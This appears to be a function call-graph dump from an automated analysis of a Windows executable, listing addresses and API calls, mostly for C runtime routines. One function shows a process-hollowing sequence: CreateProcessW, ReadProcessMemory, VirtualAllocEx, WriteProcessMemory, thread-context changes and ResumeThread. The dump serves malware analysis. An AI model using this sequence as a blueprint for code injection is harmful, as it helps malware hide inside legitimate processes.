__ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 5 API calls 14102->14105 14103 e9fbc7 14121 e954a7 14103->14121 14104 e9fb40 14104->14102 14104->14103 14107 e9e531 __fread_nolock 15 API calls 14104->14107 14109 e9fb65 __fread_nolock __alloca_probe_16 14104->14109 14108 e9fbf2 14105->14108 14107->14109 14113 e9fbf4 14108->14113 14109->14103 14110 e9e57f __strnicoll MultiByteToWideChar 14109->14110 14111 e9fbae 14110->14111 14111->14103 14112 e9fbb5 GetStringTypeW 14111->14112 14112->14103 14114 e97e1a __strnicoll 39 API calls 14113->14114 14125 e9e5a9 14118->14125 14122 e954b1 14121->14122 14123 e954c2 14121->14123 14122->14123 14127 e9c522 14122->14127 14123->14102 14126 e9e59b MultiByteToWideChar 14125->14126 14126->14104 14128 e9e4f7 ___free_lconv_mon 14 API calls 14127->14128 14167->14042 14178 e9c20e 14168->14178 14170 ea0584 14171 e9c20e __fread_nolock 29 API calls 14170->14171 14172 ea05a3 14171->14172 14179 e9c21f 14178->14179 14186 e9c21b _Yarn 14178->14186 14180 e9c226 14179->14180 14184 e9c239 __fread_nolock 14179->14184 14181 e9ad6d __dosmaperr 14 API calls 14180->14181 14182 e9c22b 14181->14182 14183 e9b458 __strnicoll 29 API calls 14182->14183 14183->14186 14185 e9c267 14184->14185 14184->14186 14188 e9c270 14184->14188 14187 e9ad6d __dosmaperr 14 API calls 14185->14187 14186->14170 14189 e9c26c 14187->14189 14188->14186 14190 e9ad6d __dosmaperr 14 API calls 14188->14190 14190->14189 14194 e9e188 14193->14194 14195 e9e17a 14193->14195 14196 e9ad6d __dosmaperr 14 API calls 14194->14196 14195->14194 14200 e9e1a0 14195->14200 14197 e9e190 14196->14197 14198 e9b458 __strnicoll 29 API calls 14197->14198 14199 e9e19a 14198->14199 14199->13954 14200->14199 14201 e9ad6d __dosmaperr 14 API calls 14200->14201 14201->14197 14203 e9b269 14202->14203 14204 e9b24c 14202->14204 14203->13960 14205 e9b263 14204->14205 14206 e9e4f7 ___free_lconv_mon 14 API calls 14204->14206 14207 e9e4f7 ___free_lconv_mon 14 API calls 14205->14207 14206->14204 14207->14203 14209 ea4931 14208->14209 14210 ea4942 14209->14210 14212 ea4955 ___from_strstr_to_strchr 14209->14212 14211 e9ad6d __dosmaperr 14 API calls 14210->14211 14220 ea4947 14211->14220 14213 ea4b6c 14212->14213 14215 ea4975 14212->14215 14214 e9ad6d __dosmaperr 14 API calls 14213->14214 14216 ea4b71 14214->14216 14271 ea4b91 14215->14271 14218 e9e4f7 ___free_lconv_mon 14 API calls 14216->14218 14218->14220 14220->13915 14221 ea49b9 14257 ea49a5 14221->14257 14275 ea4bab 14221->14275 14222 ea49bb 14226 e9f807 __dosmaperr 14 API calls 14222->14226 14222->14257 14224 ea4997 14229 ea49a0 14224->14229 14230 ea49b4 14224->14230 14228 ea49c9 14226->14228 14227 e9e4f7 ___free_lconv_mon 14 API calls 14227->14220 14232 e9e4f7 ___free_lconv_mon 14 API calls 14228->14232 14233 e9ad6d __dosmaperr 14 API calls 14229->14233 14234 ea4b91 39 API calls 14230->14234 14231 ea4a2e 14235 e9e4f7 ___free_lconv_mon 14 API calls 14231->14235 14236 ea49d4 14232->14236 14233->14257 14234->14221 14241 ea4a36 14235->14241 14236->14221 14239 e9f807 __dosmaperr 14 API calls 14236->14239 14236->14257 14237 ea4a79 14238 ea3f46 std::ios_base::_Init 32 API calls 14237->14238 14237->14257 14240 ea4aa7 14238->14240 14242 ea49f0 14239->14242 14244 e9e4f7 ___free_lconv_mon 14 API calls 14240->14244 14248 ea4a63 14241->14248 14279 ea3f46 14241->14279 14246 e9e4f7 ___free_lconv_mon 14 API calls 14242->14246 14243 ea4b61 14247 e9e4f7 ___free_lconv_mon 14 API calls 14243->14247 14244->14248 14246->14221 14247->14220 14248->14243 14251 e9f807 __dosmaperr 14 API calls 14248->14251 14248->14257 14249 ea4a5a 14250 e9e4f7 ___free_lconv_mon 14 API calls 14249->14250 14250->14248 14252 ea4af2 14251->14252 14253 ea4afa 14252->14253 14254 ea4b02 14252->14254 14255 e9e4f7 ___free_lconv_mon 14 API calls 14253->14255 14256 e9e16c ___std_exception_copy 29 API calls 14254->14256 14255->14257 14258 ea4b0e 14256->14258 14257->14227 14259 ea4b86 14258->14259 14260 ea4b15 14258->14260 14261 e9b485 __Getctype 11 API calls 14259->14261 14288 ea9a5c 14260->14288 14264 ea4b90 14261->14264 14265 ea4b5b 14266 ea4b3c 14272 ea4980 14271->14272 14273 ea4b9e 14271->14273 14272->14221 14272->14222 14272->14224 14303 ea4c00 14273->14303 14276 ea4bc1 14275->14276 14278 ea4a1e 14275->14278 14276->14278 14318 ea996b 14276->14318 14278->14231 14278->14237 14280 ea3f6e 14279->14280 14281 ea3f53 14279->14281 14285 ea3f7d 14280->14285 14418 ea9604 14280->14418 14281->14280 14282 ea3f5f 14281->14282 14283 e9ad6d __dosmaperr 14 API calls 14282->14283 14287 ea3f64 __fread_nolock 14283->14287 14425 ea757c 14285->14425 14287->14249 14437 e9f7c8 14288->14437 14293 ea9acf 14296 e9e4f7 ___free_lconv_mon 14 API calls 14293->14296 14299 ea9adb 14293->14299 14294 e9f7c8 39 API calls 14295 ea9aac 14294->14295 14298 e97f14 17 API calls 14295->14298 14296->14299 14297 e9e4f7 ___free_lconv_mon 14 API calls 14300 ea4b36 14297->14300 14301 ea9ab9 14298->14301 14299->14297 14299->14300 14300->14265 14300->14266 14301->14293 14304 ea4c0e 14303->14304 14305 ea4c13 14303->14305 14304->14272 14306 e9f807 __dosmaperr 14 API calls 14305->14306 14315 ea4c30 14306->14315 14307 ea4c9e 14309 e9b9c2 CallUnexpected 39 API calls 14307->14309 14308 ea4c8d 14310 e9e4f7 ___free_lconv_mon 14 API calls 14308->14310 14311 ea4ca3 14309->14311 14310->14304 14312 e9b485 __Getctype 11 API calls 14311->14312 14313 ea4caf 14312->14313 14314 e9f807 __dosmaperr 14 API calls 14314->14315 14315->14307 14315->14308 14315->14311 14315->14314 14316 e9e4f7 ___free_lconv_mon 14 API calls 14315->14316 14317 e9e16c ___std_exception_copy 29 API calls 14315->14317 14316->14315 14317->14315 14319 ea9979 14318->14319 14320 ea997f 14318->14320 14323 eaa0fb 14319->14323 14324 eaa0b3 14319->14324 14336 ea9994 14320->14336 14356 eaa111 14323->14356 14326 eaa0b9 14324->14326 14329 eaa0d6 14324->14329 14328 e9ad6d __dosmaperr 14 API calls 14326->14328 14327 eaa0c9 14327->14276 14330 eaa0be 14328->14330 14332 e9ad6d __dosmaperr 14 API calls 14329->14332 14335 eaa0f4 14329->14335 14331 e9b458 __strnicoll 29 API calls 14330->14331 14331->14327 14333 eaa0e5 14332->14333 14334 e9b458 __strnicoll 29 API calls 14333->14334 14334->14327 14335->14276 14337 e97e1a __strnicoll 39 API calls 14336->14337 14338 ea99aa 14337->14338 14339 ea99c6 14338->14339 14340 ea998f 14338->14340 14341 ea99dd 14338->14341 14342 e9ad6d __dosmaperr 14 API calls 14339->14342 14340->14276 14343 ea99f8 14341->14343 14344 ea99e6 14341->14344 14345 ea99cb 14342->14345 14347 ea9a18 14343->14347 14348 ea9a05 14343->14348 14346 e9ad6d __dosmaperr 14 API calls 14344->14346 14349 e9b458 __strnicoll 29 API calls 14345->14349 14350 ea99eb 14346->14350 14374 eaa1dc 14347->14374 14351 eaa111 __strnicoll 39 API calls 14348->14351 14349->14340 14353 e9b458 __strnicoll 29 API calls 14350->14353 14351->14340 14353->14340 14355 e9ad6d __dosmaperr 14 API calls 14355->14340 14357 eaa13b 14356->14357 14358 eaa121 14356->14358 14360 eaa15a 14357->14360 14361 eaa143 14357->14361 14359 e9ad6d __dosmaperr 14 API calls 14358->14359 14364 eaa126 14359->14364 14362 eaa17d 14360->14362 14363 eaa166 14360->14363 14365 e9ad6d __dosmaperr 14 API calls 14361->14365 14371 e97e1a __strnicoll 39 API calls 14362->14371 14373 eaa131 14362->14373 14367 e9ad6d __dosmaperr 14 API calls 14363->14367 14368 e9b458 __strnicoll 29 API calls 14364->14368 14366 eaa148 14365->14366 14369 e9b458 __strnicoll 29 API calls 14366->14369 14370 eaa16b 14367->14370 14368->14373 14369->14373 14372 e9b458 __strnicoll 29 API calls 14370->14372 14371->14373 14372->14373 14373->14327 14375 e97e1a __strnicoll 39 API calls 14374->14375 14376 eaa1ef 14375->14376 14379 eaa222 14376->14379 14381 eaa256 __strnicoll 14379->14381 14380 e929c6 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 5 API calls 14382 ea9a2e 14380->14382 14383 eaa2d6 14381->14383 14384 eaa4ba 14381->14384 14386 eaa2c3 GetCPInfo 14381->14386 14391 eaa2da 14381->14391 14382->14340 14382->14355 14385 e9e57f __strnicoll MultiByteToWideChar 14383->14385 14383->14391 14388 eaa35c 14385->14388 14386->14383 14386->14391 14387 eaa4ae 14389 e954a7 __freea 14 API calls 14387->14389 14388->14387 14390 e9e531 __fread_nolock 15 API calls 14388->14390 14388->14391 14392 eaa383 __alloca_probe_16 14388->14392 14389->14391 14390->14392 14391->14380 14391->14384 14392->14387 14393 e9e57f __strnicoll MultiByteToWideChar 14392->14393 14394 eaa3cf 14393->14394 14394->14387 14395 e9e57f __strnicoll MultiByteToWideChar 14394->14395 14396 eaa3eb 14395->14396 14396->14387 14397 eaa3f9 14396->14397 14398 eaa45c 14397->14398 14399 e9e531 __fread_nolock 15 API calls 14397->14399 14403 eaa412 __alloca_probe_16 14397->14403 14400 e954a7 __freea 14 API calls 14398->14400 14399->14403 14401 eaa462 14400->14401 14403->14398 14404 e9e57f __strnicoll MultiByteToWideChar 14403->14404 14405 eaa455 14404->14405 14405->14398 14419 ea960f 14418->14419 14420 ea9624 HeapSize 14418->14420 14421 e9ad6d __dosmaperr 14 API calls 14419->14421 14420->14285 14422 ea9614 14421->14422 14423 e9b458 __strnicoll 29 API calls 14422->14423 14424 ea961f 14423->14424 14424->14285 14426 ea7589 14425->14426 14427 ea7594 14425->14427 14428 e9e531 __fread_nolock 15 API calls 14426->14428 14429 ea759c 14427->14429 14435 ea75a5 __dosmaperr 14427->14435 14434 ea7591 14428->14434 14430 e9e4f7 ___free_lconv_mon 14 API calls 14429->14430 14430->14434 14431 ea75aa 14433 e9ad6d __dosmaperr 14 API calls 14431->14433 14432 ea75cf HeapReAlloc 14432->14434 14432->14435 14433->14434 14434->14287 14435->14431 14435->14432 14436 e98f08 std::ios_base::_Init 2 API calls 14435->14436 14436->14435 14438 e97e1a __strnicoll 39 API calls 14437->14438 14439 e9f7da 14438->14439 14440 e9f7ec 14439->14440 14445 e9f04d 14439->14445 14442 e97f14 14440->14442 14451 e97f6c 14442->14451 14448 e9f5b9 14445->14448 14449 e9f534 std::_Lockit::_Lockit 5 API calls 14448->14449 14450 e9f055 14449->14450 14450->14440 14452 e97f7a 14451->14452 14453 e97f94 14451->14453 14469 e97efa 14452->14469 14455 e97f9b 14453->14455 14456 e97fba 14453->14456 14468 e97f2c 14455->14468 14473 e97ebb 14455->14473 14457 e9e57f __strnicoll MultiByteToWideChar 14456->14457 14462 e97fc9 14457->14462 14459 e97fd0 GetLastError 14478 e9ad93 14459->14478 14461 e97ff6 14465 e9e57f __strnicoll MultiByteToWideChar 14461->14465 14461->14468 14462->14459 14462->14461 14464 e97ebb 15 API calls 14462->14464 14464->14461 14467 e9800d 14465->14467 14467->14459 14467->14468 14468->14293 14468->14294 14470 e97f05 14469->14470 14472 e97f0d 14469->14472 14471 e9e4f7 ___free_lconv_mon 14 API calls 14470->14471 14471->14472 14472->14468 14474 e97efa 14 API calls 14473->14474 14475 e97ec9 14474->14475 14483 e97e9c 14475->14483 14486 e9ad80 14478->14486 14484 e9e531 __fread_nolock 15 API calls 14483->14484 14485 e97ea9 14484->14485 14485->14468 14490 e929c6 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 5 API calls 14489->14490 14491 e958ca 14490->14491 14491->13410 14493 e98d4e 14492->14493 14494 e98d5f 14492->14494 14496 e94fcd CallUnexpected GetModuleHandleW 14493->14496 14508 e98ebb 14494->14508 14498 e98d53 14496->14498 14498->14494 14503 e98c55 GetModuleHandleExW 14498->14503 14499 e98c0d 14499->13381 14504 e98c94 GetProcAddress 14503->14504 14505 e98ca8 14503->14505 14504->14505 14506 e98cbb FreeLibrary 14505->14506 14507 e98cc4 14505->14507 14506->14507 14507->14494 14509 e98ec7 ___scrt_is_nonwritable_in_current_image 14508->14509 14523 e9b750 EnterCriticalSection 14509->14523 14511 e98ed1 14524 e98db8 14511->14524 14513 e98ede 14528 e98efc 14513->14528 14516 e98cf0 14553 e98cd7 14516->14553 14518 e98cfa 14519 e98d0e 14518->14519 14520 e98cfe GetCurrentProcess TerminateProcess 14518->14520 14521 e98c55 CallUnexpected 3 API calls 14519->14521 14520->14519 14522 e98d16 ExitProcess 14521->14522 14523->14511 14527 e98dc4 ___scrt_is_nonwritable_in_current_image CallUnexpected 14524->14527 14525 e98e28 CallUnexpected 14525->14513 14527->14525 14531 e9aa87 14527->14531 14552 e9b767 LeaveCriticalSection 14528->14552 14530 e98d97 14530->14499 14530->14516 14532 e9aa93 __EH_prolog3 14531->14532 14535 e9ad12 14532->14535 14534 e9aaba std::ios_base::_Init 14534->14525 14536 e9ad1e ___scrt_is_nonwritable_in_current_image 14535->14536 14543 e9b750 EnterCriticalSection 14536->14543 14538 e9ad2c 14544 e9abdd 14538->14544 14543->14538 14545 e9abf4 14544->14545 14547 e9abfc 14544->14547 14548 e9ad61 14545->14548 14546 e9e4f7 ___free_lconv_mon 14 API calls 14546->14545 14547->14545 14547->14546 14551 e9b767 LeaveCriticalSection 14548->14551 14550 e9ad4a 14550->14534 14551->14550 14552->14530 14556 ea0f55 14553->14556 14555 e98cdc CallUnexpected 14555->14518 14557 ea0f64 CallUnexpected 14556->14557 14558 ea0f71 14557->14558 14560 e9f3e7 14557->14560 14558->14555 14561 e9f534 std::_Lockit::_Lockit 5 API calls 14560->14561 14562 e9f403 14561->14562 14562->14558 14564 e986a9 ___scrt_uninitialize_crt 14563->14564 14565 e98697 14563->14565 14564->13419 14566 e986a5 14565->14566 14568 e9bbb9 14565->14568 14566->13419 14571 e9bce4 14568->14571 14574 e9bdbd 14571->14574 14575 e9bdc9 ___scrt_is_nonwritable_in_current_image 14574->14575 14582 e9b750 EnterCriticalSection 14575->14582 14577 e9be3f 14591 e9be5d 14577->14591 14581 e9bdd3 ___scrt_uninitialize_crt 14581->14577 14583 e9bd31 14581->14583 14582->14581 14584 e9bd3d ___scrt_is_nonwritable_in_current_image 14583->14584 14594 e9875f EnterCriticalSection 14584->14594 14586 e9bd47 ___scrt_uninitialize_crt 14590 e9bd80 14586->14590 14595 e9bbc2 14586->14595 14606 e9bdb1 14590->14606 14707 e9b767 LeaveCriticalSection 14591->14707 14593 e9bbc0 14593->14566 14594->14586 14596 e9bbd7 _Fputc 14595->14596 14597 e9bbe9 14596->14597 14598 e9bbde 14596->14598 14609 e9bc27 14597->14609 14600 e9bce4 ___scrt_uninitialize_crt 68 API calls 14598->14600 14603 e9bbe4 _Fputc 14600->14603 14603->14590 14604 e9bc0a 14622 ea5164 14604->14622 14706 e98773 LeaveCriticalSection 14606->14706 14608 e9bd9f 14608->14581 14610 e9bbf3 14609->14610 14611 e9bc40 14609->14611 14610->14603 14615 ea0efc 14610->14615 14611->14610 14612 ea0efc _Fputc 29 API calls 14611->14612 14613 e9bc5c 14612->14613 14633 ea549f 14613->14633 14616 ea0f08 14615->14616 14617 ea0f1d 14615->14617 14618 e9ad6d __dosmaperr 14 API calls 14616->14618 14617->14604 14619 ea0f0d 14618->14619 14620 e9b458 __strnicoll 29 API calls 14619->14620 14621 ea0f18 14620->14621 14621->14604 14623 ea5182 14622->14623 14624 ea5175 14622->14624 14626 ea51cb 14623->14626 14630 ea51a9 14623->14630 14625 e9ad6d __dosmaperr 14 API calls 14624->14625 14629 ea517a 14625->14629 14627 e9ad6d __dosmaperr 14 API calls 14626->14627 14628 ea51d0 14627->14628 14631 e9b458 __strnicoll 29 API calls 14628->14631 14629->14603 14676 ea51e1 14630->14676 14631->14629 14634 ea54ab ___scrt_is_nonwritable_in_current_image 14633->14634 14635 ea54ec 14634->14635 14637 ea5532 14634->14637 14643 ea54b3 14634->14643 14636 e9b601 _Fputc 29 API calls 14635->14636 14636->14643 14644 ea4ef9 EnterCriticalSection 14637->14644 14639 ea5538 14640 ea5556 14639->14640 14645 ea5283 14639->14645 14673 ea55a8 14640->14673 14643->14610 14644->14639 14646 ea52ab 14645->14646 14669 ea52ce __fread_nolock 14645->14669 14647 ea52af 14646->14647 14649 ea530a 14646->14649 14648 e9b601 _Fputc 29 API calls 14647->14648 14648->14669 14650 ea5328 14649->14650 14651 ea4033 _Fputc 31 API calls 14649->14651 14652 ea55b0 _Fputc 40 API calls 14650->14652 14651->14650 14669->14640 14674 ea4f1c __fread_nolock LeaveCriticalSection 14673->14674 14675 ea55ae 14674->14675 14675->14643 14677 ea51ed ___scrt_is_nonwritable_in_current_image 14676->14677 14689 ea4ef9 EnterCriticalSection 14677->14689 14679 ea51fc 14688 ea5241 14679->14688 14690 ea4cb0 14679->14690 14681 e9ad6d __dosmaperr 14 API calls 14688->14681 14689->14679 14691 ea4cbd 14690->14691 14692 ea4cd2 14690->14692 14693 e9ad80 __dosmaperr 14 API calls 14691->14693 14695 e9ad80 __dosmaperr 14 API calls 14692->14695 14697 ea4cf7 14692->14697 14706->14608 14707->14593 16982 e93fa3 16983 e93fb9 _Yarn 16982->16983 16984 e93fbf 16983->16984 16985 e94065 16983->16985 16988 e9c32c 16983->16988 16985->16984 16987 e9c32c __fread_nolock 45 API calls 16985->16987 16987->16984 16991 e9c28f 16988->16991 16993 e9c29b ___scrt_is_nonwritable_in_current_image 16991->16993 16992 e9c2d3 16992->16983 16993->16992 16994 e9c2ae __fread_nolock 16993->16994 16995 e9c2e5 16993->16995 16997 e9ad6d __dosmaperr 14 API calls 16994->16997 17004 e9875f EnterCriticalSection 16995->17004 17000 e9c2c8 16997->17000 16998 e9c2ef 17005 e9c349 16998->17005 17002 e9b458 __strnicoll 29 API calls 17000->17002 17002->16992 17004->16998 17009 e9c35b __fread_nolock 17005->17009 17012 e9c306 17005->17012 17006 e9c368 17007 e9ad6d __dosmaperr 14 API calls 17006->17007 17008 e9c36d 17007->17008 17010 e9b458 __strnicoll 29 API calls 17008->17010 17009->17006 17009->17012 17017 e9c3b9 17009->17017 17010->17012 17011 ea5d52 __fread_nolock 43 API calls 17011->17017 17019 e9c324 17012->17019 17013 e9c4e4 __fread_nolock 17016 e9ad6d __dosmaperr 14 API calls 17013->17016 17014 e9c20e __fread_nolock 29 API calls 17014->17017 17015 ea0efc _Fputc 29 API calls 17015->17017 17016->17008 17017->17011 17017->17012 17017->17013 17017->17014 17017->17015 17018 ea625d __fread_nolock 41 API calls 17017->17018 17018->17017 17022 e98773 LeaveCriticalSection 17019->17022 17021 e9c32a 17021->16992 17022->17021 15692 e942bc 15693 e942c8 15692->15693 15697 e942ff 15693->15697 15698 e9cc2c 15693->15698 15695 e942ec 15696 e94362 29 API calls 15695->15696 15695->15697 15696->15697 15699 e9cc3f _Fputc 15698->15699 15702 e9cc99 15699->15702 15701 e9cc54 _Fputc 15701->15695 15703 e9ccab 15702->15703 15705 e9ccce 15702->15705 15704 e9b601 _Fputc 29 API calls 15703->15704 15706 e9ccc6 15704->15706 15705->15703 15707 e9ccf5 15705->15707 15706->15701 15710 e9cdcf 15707->15710 15711 e9cddb ___scrt_is_nonwritable_in_current_image 15710->15711 15718 e9875f EnterCriticalSection 15711->15718 15713 e9cde9 15719 e9cd2f 15713->15719 15715 e9cdf6 15728 e9ce1e 15715->15728 15718->15713 15720 e9bc27 ___scrt_uninitialize_crt 64 API calls 15719->15720 15721 e9cd4a 15720->15721 15731 ea0d89 15721->15731 15724 e9f807 __dosmaperr 14 API calls 15725 e9cd93 15724->15725 15726 e9e4f7 ___free_lconv_mon 14 API calls 15725->15726 15727 e9cd6f 15726->15727 15727->15715 15735 e98773 LeaveCriticalSection 15728->15735 15730 e9cd2d 15730->15701 15732 e9cd54 15731->15732 15733 ea0da0 15731->15733 15732->15724 15732->15727 15733->15732 15734 e9e4f7 ___free_lconv_mon 14 API calls 15733->15734 15734->15732 15735->15730 13350 eb519e 13357 eb51d4 13350->13357 13351 eb5321 GetPEB 13352 eb5333 CreateProcessW VirtualAlloc Wow64GetThreadContext ReadProcessMemory VirtualAllocEx 13351->13352 13353 eb53da WriteProcessMemory 13352->13353 13352->13357 13354 eb541f 13353->13354 13355 eb5461 WriteProcessMemory Wow64SetThreadContext ResumeThread 13354->13355 13356 eb5424 WriteProcessMemory 13354->13356 13356->13354 13357->13351 13357->13352 17198 e9416b 17199 e9417f 17198->17199 17200 e943df 69 API calls 17199->17200 17205 e941da 17199->17205 17201 e941aa 17200->17201 17202 e941c7 17201->17202 17203 e9ae1d 67 API calls 17201->17203 17201->17205 17202->17205 17206 e9c01e 17202->17206 17203->17202 17207 e9c029 17206->17207 17208 e9c03e 17206->17208 17209 e9ad6d __dosmaperr 14 API calls 17207->17209 17210 e9c05b 17208->17210 17211 e9c046 17208->17211 17212 e9c02e 17209->17212 17220 ea4217 17210->17220 17213 e9ad6d __dosmaperr 14 API calls 17211->17213 17215 e9b458 __strnicoll 29 API calls 17212->17215 17216 e9c04b 17213->17216 17218 e9c039 17215->17218 17219 e9b458 __strnicoll 29 API calls 17216->17219 17217 e9c056 17217->17205 17218->17205 17219->17217 17221 ea422b _Fputc 17220->17221 17224 ea47c0 17221->17224 17223 ea4237 _Fputc 17223->17217 17225 ea47cc ___scrt_is_nonwritable_in_current_image 17224->17225 17226 ea47d3 17225->17226 17227 ea47f6 17225->17227 17229 e9b601 _Fputc 29 API calls 17226->17229 17235 e9875f EnterCriticalSection 17227->17235 17234 ea47ec 17229->17234 17230 ea4804 17236 ea461f 17230->17236 17232 ea4813 17249 ea4845 17232->17249 17234->17223 17235->17230 17237 ea462e 17236->17237 17238 ea4656 17236->17238 17239 e9b601 _Fputc 29 API calls 17237->17239 17240 ea0efc _Fputc 29 API calls 17238->17240 17248 ea4649 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 17239->17248 17241 ea465f 17240->17241 17242 ea4051 33 API calls 17241->17242 17243 ea467d 17242->17243 17244 ea4709 17243->17244 17246 ea4720 17243->17246 17243->17248 17245 ea42a9 34 API calls 17244->17245 17245->17248 17247 ea4454 33 API calls 17246->17247 17246->17248 17247->17248 17248->17232 17252 e98773 LeaveCriticalSection 17249->17252 17251 ea484d 17251->17234 17252->17251 16128 e9884f 16129 e9bbb9 ___scrt_uninitialize_crt 68 API calls 16128->16129 16130 e98857 16129->16130 16138 ea0cde 16130->16138 16132 e9885c 16133 ea0d89 14 API calls 16132->16133 16134 e9886b DeleteCriticalSection 16133->16134 16134->16132 16135 e98886 16134->16135 16136 e9e4f7 ___free_lconv_mon 14 API calls 16135->16136 16137 e98891 16136->16137 16139 ea0cea ___scrt_is_nonwritable_in_current_image 16138->16139 16148 e9b750 EnterCriticalSection 16139->16148 16141 ea0d61 16153 ea0d80 16141->16153 16142 ea0cf5 16142->16141 16144 ea0d35 DeleteCriticalSection 16142->16144 16149 e9ba11 16142->16149 16147 e9e4f7 ___free_lconv_mon 14 API calls 16144->16147 16147->16142 16148->16142 16150 e9ba24 _Fputc 16149->16150 16156 e9bacf 16150->16156 16152 e9ba30 _Fputc 16152->16142 16228 e9b767 LeaveCriticalSection 16153->16228 16155 ea0d6d 16155->16132 16157 e9badb ___scrt_is_nonwritable_in_current_image 16156->16157 16158 e9bb08 16157->16158 16159 e9bae5 16157->16159 16160 e9bb00 16158->16160 16167 e9875f EnterCriticalSection 16158->16167 16161 e9b601 _Fputc 29 API calls 16159->16161 16160->16152 16161->16160 16163 e9bb26 16168 e9ba41 16163->16168 16165 e9bb33 16182 e9bb5e 16165->16182 16167->16163 16169 e9ba4e 16168->16169 16170 e9ba71 16168->16170 16171 e9b601 _Fputc 29 API calls 16169->16171 16172 e9bc27 ___scrt_uninitialize_crt 64 API calls 16170->16172 16173 e9ba69 16170->16173 16171->16173 16174 e9ba89 16172->16174 16173->16165 16175 ea0d89 14 API calls 16174->16175 16176 e9ba91 16175->16176 16177 ea0efc _Fputc 29 API calls 16176->16177 16178 e9ba9d 16177->16178 16185 ea4ff5 16178->16185 16181 e9e4f7 ___free_lconv_mon 14 API calls 16181->16173 16227 e98773 LeaveCriticalSection 16182->16227 16184 e9bb64 16184->16160 16186 ea501e 16185->16186 16191 e9baa4 16185->16191 16187 ea506d 16186->16187 16189 ea5045 16186->16189 16188 e9b601 _Fputc 29 API calls 16187->16188 16188->16191 16192 ea5098 16189->16192 16191->16173 16191->16181 16193 ea50a4 ___scrt_is_nonwritable_in_current_image 16192->16193 16200 ea4ef9 EnterCriticalSection 16193->16200 16195 ea50b2 16196 ea50e3 16195->16196 16201 ea4f55 16195->16201 16214 ea511d 16196->16214 16200->16195 16202 ea4cb0 __fread_nolock 29 API calls 16201->16202 16204 ea4f65 16202->16204 16203 ea4f6b 16217 ea4d1a 16203->16217 16204->16203 16206 ea4f9d 16204->16206 16207 ea4cb0 __fread_nolock 29 API calls 16204->16207 16206->16203 16208 ea4cb0 __fread_nolock 29 API calls 16206->16208 16210 ea4f94 16207->16210 16209 ea4fa9 CloseHandle 16208->16209 16209->16203 16211 ea4fb5 GetLastError 16209->16211 16212 ea4cb0 __fread_nolock 29 API calls 16210->16212 16211->16203 16212->16206 16213 ea4fc3 __fread_nolock 16213->16196 16226 ea4f1c LeaveCriticalSection 16214->16226 16216 ea5106 16216->16191 16218 ea4d29 16217->16218 16219 ea4d90 16217->16219 16218->16219 16225 ea4d53 16218->16225 16220 e9ad6d __dosmaperr 14 API calls 16219->16220 16221 ea4d95 16220->16221 16222 e9ad80 __dosmaperr 14 API calls 16221->16222 16223 ea4d80 16222->16223 16223->16213 16224 ea4d7a SetStdHandle 16224->16223 16225->16223 16225->16224 16226->16216 16227->16184 16228->16155 16323 e9422c 16324 e9424e 16323->16324 16328 e94263 16323->16328 16329 e943df 16324->16329 16330 e943f9 16329->16330 16333 e94448 16329->16333 16330->16333 16334 e9c578 69 API calls 16330->16334 16331 e929c6 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 5 API calls 16332 e94253 16331->16332 16332->16328 16335 e9c53d 16332->16335 16333->16331 16334->16333 16336 e9c548 16335->16336 16337 e9c55d 16335->16337 16338 e9ad6d __dosmaperr 14 API calls 16336->16338 16337->16336 16339 e9c564 16337->16339 16340 e9c54d 16338->16340 16345 e9ae1d 16339->16345 16342 e9b458 __strnicoll 29 API calls 16340->16342 16344 e9c558 16342->16344 16343 e9c573 16343->16328 16344->16328 16346 e9ae30 _Fputc 16345->16346 16349 e9b096 16346->16349 16348 e9ae45 _Fputc 16348->16343 16350 e9b0a2 ___scrt_is_nonwritable_in_current_image 16349->16350 16351 e9b0a8 16350->16351 16354 e9b0eb 16350->16354 16352 e9b601 _Fputc 29 API calls 16351->16352 16353 e9b0c3 16352->16353 16353->16348 16360 e9875f EnterCriticalSection 16354->16360 16356 e9b0f7 16361 e9afaa 16356->16361 16358 e9b10d 16372 e9b136 16358->16372 16360->16356 16362 e9afbd 16361->16362 16363 e9afd0 16361->16363 16362->16358 16375 e9aed1 16363->16375 16365 e9aff3 16366 e9b081 16365->16366 16367 e9b00e 16365->16367 16379 ea424d 16365->16379 16366->16358 16369 e9bc27 ___scrt_uninitialize_crt 64 API calls 16367->16369 16370 e9b021 16369->16370 16393 ea4033 16370->16393 16444 e98773 LeaveCriticalSection 16372->16444 16374 e9b13e 16374->16353 16376 e9aee2 16375->16376 16378 e9af3a 16375->16378 16376->16378 16396 ea3ff3 16376->16396 16378->16365 16380 ea461f 16379->16380 16381 ea462e 16380->16381 16382 ea4656 16380->16382 16383 e9b601 _Fputc 29 API calls 16381->16383 16384 ea0efc _Fputc 29 API calls 16382->16384 16392 ea4649 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 16383->16392 16385 ea465f 16384->16385 16406 ea4051 16385->16406 16388 ea4709 16409 ea42a9 16388->16409 16390 ea4720 16390->16392 16421 ea4454 16390->16421 16392->16367 16394 ea4194 __fread_nolock 31 API calls 16393->16394 16395 ea404c 16394->16395 16395->16366 16397 ea4007 _Fputc 16396->16397 16400 ea4194 16397->16400 16399 ea401c _Fputc 16399->16378 16401 ea4cb0 __fread_nolock 29 API calls 16400->16401 16402 ea41a6 16401->16402 16403 ea41c2 SetFilePointerEx 16402->16403 16404 ea41ae __fread_nolock 16402->16404 16403->16404 16405 ea41da GetLastError 16403->16405 16404->16399 16405->16404 16428 ea406f 16406->16428 16410 ea42b8 _Fputc 16409->16410 16411 ea0efc _Fputc 29 API calls 16410->16411 16413 ea42d4 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 16411->16413 16412 e929c6 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 5 API calls 16414 ea4452 16412->16414 16415 ea4051 33 API calls 16413->16415 16420 ea42e0 16413->16420 